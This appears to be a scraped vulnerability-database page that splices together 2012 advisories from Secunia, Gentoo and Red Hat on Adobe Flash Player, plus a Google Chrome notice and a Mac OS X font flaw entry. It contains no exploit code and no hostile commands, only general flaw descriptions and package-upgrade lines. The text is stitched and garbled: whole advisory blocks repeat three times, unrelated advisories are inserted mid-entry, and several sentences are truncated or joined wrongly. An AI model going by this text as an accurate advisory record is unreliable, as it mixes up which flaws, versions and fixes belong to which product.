Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Furthermore, a remote attacker may be able to bypass intended access
restrictions, bypass cross-domain policy, inject arbitrary web script,
or obtain sensitive information.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.228"
References
==========
[ 1 ] CVE-2011-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2445
[ 2 ] CVE-2011-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2450
[ 3 ] CVE-2011-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2451
[ 4 ] CVE-2011-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2452
[ 5 ] CVE-2011-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2453
[ 6 ] CVE-2011-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2454
[ 7 ] CVE-2011-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2455
[ 8 ] CVE-2011-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2456
[ 9 ] CVE-2011-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2457
[ 10 ] CVE-2011-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2458
[ 11 ] CVE-2011-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2459
[ 12 ] CVE-2011-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2460
[ 13 ] CVE-2012-0752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0752
[ 14 ] CVE-2012-0753
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0753
[ 15 ] CVE-2012-0754
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0754
[ 16 ] CVE-2012-0755
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0755
[ 17 ] CVE-2012-0756
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0756
[ 18 ] CVE-2012-0767
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0767
[ 19 ] CVE-2012-0768
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0768
[ 20 ] CVE-2012-0769
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0769
[ 21 ] CVE-2012-0773
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0773
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201204-07.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March
Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817.
1) An unspecified error in an ActiveX Control can be exploited to
corrupt memory.
2) A type confusion error can be exploited to corrupt memory.
3) An unspecified error related to MP4 parsing can be exploited to
corrupt memory.
4) An unspecified error can be exploited to corrupt memory.
5) An unspecified error can be exploited to bypass certain security
restrictions.
6) An unspecified error can be exploited to bypass certain security
restrictions.
Successful exploitation of the vulnerabilities #1 through #6 may
allow execution of arbitrary code.
7) Certain unspecified input is not properly sanitised before being
returned to the user.
NOTE: This vulnerability is reportedly being actively exploited in
targeted attacks. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
conduct cross-site scripting attacks, gain knowledge of potentially
sensitive information, bypass certain security restrictions, and
compromise a user's system
VAR-201202-0248 | CVE-2012-0752 | Adobe Flash Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) by leveraging an unspecified "type confusion.". Adobe Flash Player is prone to an unspecified remote memory-corruption vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2012:0144-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0144.html
Issue date: 2012-02-17
CVE Names: CVE-2012-0752 CVE-2012-0753 CVE-2012-0754
CVE-2012-0755 CVE-2012-0756 CVE-2012-0767
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. Description:
The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash
Player web browser plug-in. These
vulnerabilities are detailed on the Adobe security page APSB12-03, listed
in the References section.
Multiple security flaws were found in the way flash-plugin displayed
certain SWF content. An attacker could use these flaws to create a
specially-crafted SWF file that would cause flash-plugin to crash or,
potentially, execute arbitrary code when the victim loaded a page
containing the specially-crafted SWF content. (CVE-2012-0752,
CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756)
A flaw in flash-plugin could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
791034 - CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 flash-plugin: multiple code execution flaws (APSB12-03)
791035 - CVE-2012-0767 flash-plugin: universal cross-site scripting flaw (APSB12-03)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-10.3.183.15-1.el5.i386.rpm
x86_64:
flash-plugin-10.3.183.15-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-10.3.183.15-1.el5.i386.rpm
x86_64:
flash-plugin-10.3.183.15-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-0752.html
https://www.redhat.com/security/data/cve/CVE-2012-0753.html
https://www.redhat.com/security/data/cve/CVE-2012-0754.html
https://www.redhat.com/security/data/cve/CVE-2012-0755.html
https://www.redhat.com/security/data/cve/CVE-2012-0756.html
https://www.redhat.com/security/data/cve/CVE-2012-0767.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb12-03.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPPj8uXlSAg2UNWIIRApwYAJ40DTytRRob5RU/qeWrOqIfFF4TywCbBsdq
2hfvaUbJyuTg8og5n/gSdGc=
=7NQZ
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
Google Chrome Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA48265
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48265/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=48265
RELEASE DATE:
2012-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/48265/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/48265/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48265
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Google Chrome, where one
has an unknown impact and others can be exploited by malicious people
to conduct cross-site scripting attacks, bypass certain security
restrictions, and compromise a user's system.
1) A use-after-free error exists within v8 element wrapper handling.
2) A use-after-free error exists within SVG value handling.
3) A buffer overflow exists within the Skia drawing library.
4) A use-after-free error exists within SVG document handling.
5) A use-after-free error exists within SVG use handling.
6) A casting error exists within line box handling.
7) A casting error exists within anonymous block splitting.
8) A use-after-free error exists within multi-column handling.
9) A use-after-free error exists within quote handling.
10) An out-of-bounds read error exists within text handling.
11) A use-after-free error exists within class attribute handling.
12) A use-after-free error exists within table section handling.
13) A use-after-free error exists within flexbox with floats
handling.
14) A use-after-free error exists within SVG animation elements
handling.
For more information:
SA48033
SOLUTION:
Update to version 17.0.963.65.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Chamal de Silva
2, 4, 5, 14) Arthur Gerkis
3) Aki Helin, OUSPG
6, 7, 8, 9, 10, 11, 12, 13) miaubiz
ORIGINAL ADVISORY:
http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Furthermore, a remote attacker may be able to bypass intended access
restrictions, bypass cross-domain policy, inject arbitrary web script,
or obtain sensitive information.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.228"
References
==========
[ 1 ] CVE-2011-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2445
[ 2 ] CVE-2011-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2450
[ 3 ] CVE-2011-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2451
[ 4 ] CVE-2011-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2452
[ 5 ] CVE-2011-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2453
[ 6 ] CVE-2011-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2454
[ 7 ] CVE-2011-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2455
[ 8 ] CVE-2011-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2456
[ 9 ] CVE-2011-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2457
[ 10 ] CVE-2011-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2458
[ 11 ] CVE-2011-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2459
[ 12 ] CVE-2011-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2460
[ 13 ] CVE-2012-0752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0752
[ 14 ] CVE-2012-0753
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0753
[ 15 ] CVE-2012-0754
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0754
[ 16 ] CVE-2012-0755
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0755
[ 17 ] CVE-2012-0756
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0756
[ 18 ] CVE-2012-0767
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0767
[ 19 ] CVE-2012-0768
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0768
[ 20 ] CVE-2012-0769
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0769
[ 21 ] CVE-2012-0773
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0773
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201204-07.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March
Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817.
1) An unspecified error in an ActiveX Control can be exploited to
corrupt memory.
2) A type confusion error can be exploited to corrupt memory.
3) An unspecified error related to MP4 parsing can be exploited to
corrupt memory.
4) An unspecified error can be exploited to corrupt memory.
5) An unspecified error can be exploited to bypass certain security
restrictions.
6) An unspecified error can be exploited to bypass certain security
restrictions.
Successful exploitation of the vulnerabilities #1 through #6 may
allow execution of arbitrary code.
7) Certain unspecified input is not properly sanitised before being
returned to the user.
NOTE: This vulnerability is reportedly being actively exploited in
targeted attacks. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
conduct cross-site scripting attacks, gain knowledge of potentially
sensitive information, bypass certain security restrictions, and
compromise a user's system
VAR-201202-0246 | CVE-2012-0755 | Adobe Flash Player Vulnerable to access restrictions |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to bypass intended access restrictions via unspecified vectors, a different vulnerability than CVE-2012-0756. Adobe Flash Player Contains a vulnerability that prevents access restrictions. This vulnerability CVE-2012-0756 Is a different vulnerability.An attacker may be able to bypass access restrictions.
An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: flash-plugin security update
Advisory ID: RHSA-2012:0144-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0144.html
Issue date: 2012-02-17
CVE Names: CVE-2012-0752 CVE-2012-0753 CVE-2012-0754
CVE-2012-0755 CVE-2012-0756 CVE-2012-0767
=====================================================================
1. Summary:
An updated Adobe Flash Player package that fixes multiple security issues
is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3. These
vulnerabilities are detailed on the Adobe security page APSB12-03, listed
in the References section.
Multiple security flaws were found in the way flash-plugin displayed
certain SWF content. An attacker could use these flaws to create a
specially-crafted SWF file that would cause flash-plugin to crash or,
potentially, execute arbitrary code when the victim loaded a page
containing the specially-crafted SWF content. (CVE-2012-0752,
CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756)
A flaw in flash-plugin could allow an attacker to conduct cross-site
scripting (XSS) attacks if a victim were tricked into visiting a
specially-crafted web page.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
5. Bugs fixed (http://bugzilla.redhat.com/):
791034 - CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 flash-plugin: multiple code execution flaws (APSB12-03)
791035 - CVE-2012-0767 flash-plugin: universal cross-site scripting flaw (APSB12-03)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
flash-plugin-10.3.183.15-1.el5.i386.rpm
x86_64:
flash-plugin-10.3.183.15-1.el5.i386.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
flash-plugin-10.3.183.15-1.el5.i386.rpm
x86_64:
flash-plugin-10.3.183.15-1.el5.i386.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
flash-plugin-10.3.183.15-1.el6.i686.rpm
x86_64:
flash-plugin-10.3.183.15-1.el6.i686.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-0752.html
https://www.redhat.com/security/data/cve/CVE-2012-0753.html
https://www.redhat.com/security/data/cve/CVE-2012-0754.html
https://www.redhat.com/security/data/cve/CVE-2012-0755.html
https://www.redhat.com/security/data/cve/CVE-2012-0756.html
https://www.redhat.com/security/data/cve/CVE-2012-0767.html
https://access.redhat.com/security/updates/classification/#critical
http://www.adobe.com/support/security/bulletins/apsb12-03.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPPj8uXlSAg2UNWIIRApwYAJ40DTytRRob5RU/qeWrOqIfFF4TywCbBsdq
2hfvaUbJyuTg8og5n/gSdGc=
=7NQZ
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
Become a PSI 3.0 beta tester!
Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface.
Download it here!
http://secunia.com/psi_30_beta_launch
----------------------------------------------------------------------
TITLE:
Google Chrome Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA48265
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/48265/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=48265
RELEASE DATE:
2012-03-05
DISCUSS ADVISORY:
http://secunia.com/advisories/48265/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/48265/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48265
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Google Chrome, where one
has an unknown impact and others can be exploited by malicious people
to conduct cross-site scripting attacks, bypass certain security
restrictions, and compromise a user's system.
1) A use-after-free error exists within v8 element wrapper handling.
2) A use-after-free error exists within SVG value handling.
3) A buffer overflow exists within the Skia drawing library.
4) A use-after-free error exists within SVG document handling.
5) A use-after-free error exists within SVG use handling.
6) A casting error exists within line box handling.
7) A casting error exists within anonymous block splitting.
8) A use-after-free error exists within multi-column handling.
9) A use-after-free error exists within quote handling.
10) An out-of-bounds read error exists within text handling.
11) A use-after-free error exists within class attribute handling.
12) A use-after-free error exists within table section handling.
13) A use-after-free error exists within flexbox with floats
handling.
14) A use-after-free error exists within SVG animation elements
handling.
For more information:
SA48033
SOLUTION:
Update to version 17.0.963.65.
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Chamal de Silva
2, 4, 5, 14) Arthur Gerkis
3) Aki Helin, OUSPG
6, 7, 8, 9, 10, 11, 12, 13) miaubiz
ORIGINAL ADVISORY:
http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Background
==========
The Adobe Flash Player is a renderer for the SWF file format, which is
commonly used to provide interactive websites.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Flash Player users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.228"
References
==========
[ 1 ] CVE-2011-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2445
[ 2 ] CVE-2011-2450
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2450
[ 3 ] CVE-2011-2451
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2451
[ 4 ] CVE-2011-2452
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2452
[ 5 ] CVE-2011-2453
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2453
[ 6 ] CVE-2011-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2454
[ 7 ] CVE-2011-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2455
[ 8 ] CVE-2011-2456
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2456
[ 9 ] CVE-2011-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2457
[ 10 ] CVE-2011-2458
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2458
[ 11 ] CVE-2011-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2459
[ 12 ] CVE-2011-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2460
[ 13 ] CVE-2012-0752
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0752
[ 14 ] CVE-2012-0753
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0753
[ 15 ] CVE-2012-0754
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0754
[ 16 ] CVE-2012-0755
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0755
[ 17 ] CVE-2012-0756
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0756
[ 18 ] CVE-2012-0767
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0767
[ 19 ] CVE-2012-0768
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0768
[ 20 ] CVE-2012-0769
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0769
[ 21 ] CVE-2012-0773
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0773
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201204-07.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March
Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817.
1) An unspecified error in an ActiveX Control can be exploited to
corrupt memory.
2) A type confusion error can be exploited to corrupt memory.
3) An unspecified error related to MP4 parsing can be exploited to
corrupt memory.
4) An unspecified error can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities #1 through #6 may
allow execution of arbitrary code.
7) Certain unspecified input is not properly sanitised before being
returned to the user.
NOTE: This vulnerability is reportedly being actively exploited in
targeted attacks. This fixes multiple
vulnerabilities, which can be exploited by malicious people to
conduct cross-site scripting attacks, gain knowledge of potentially
sensitive information, bypass certain security restrictions, and
compromise a user's system
VAR-201202-0147 | CVE-2011-3446 | Apple Mac OS X CoreText embedded font vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Apple Type Services (ATS) in Apple Mac OS X before 10.7.3 does not properly manage memory for data-font files, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted font that is accessed by Font Book.
Attackers can exploit this issue by enticing an unsuspecting user to open a malicious font file in the Font Book application.
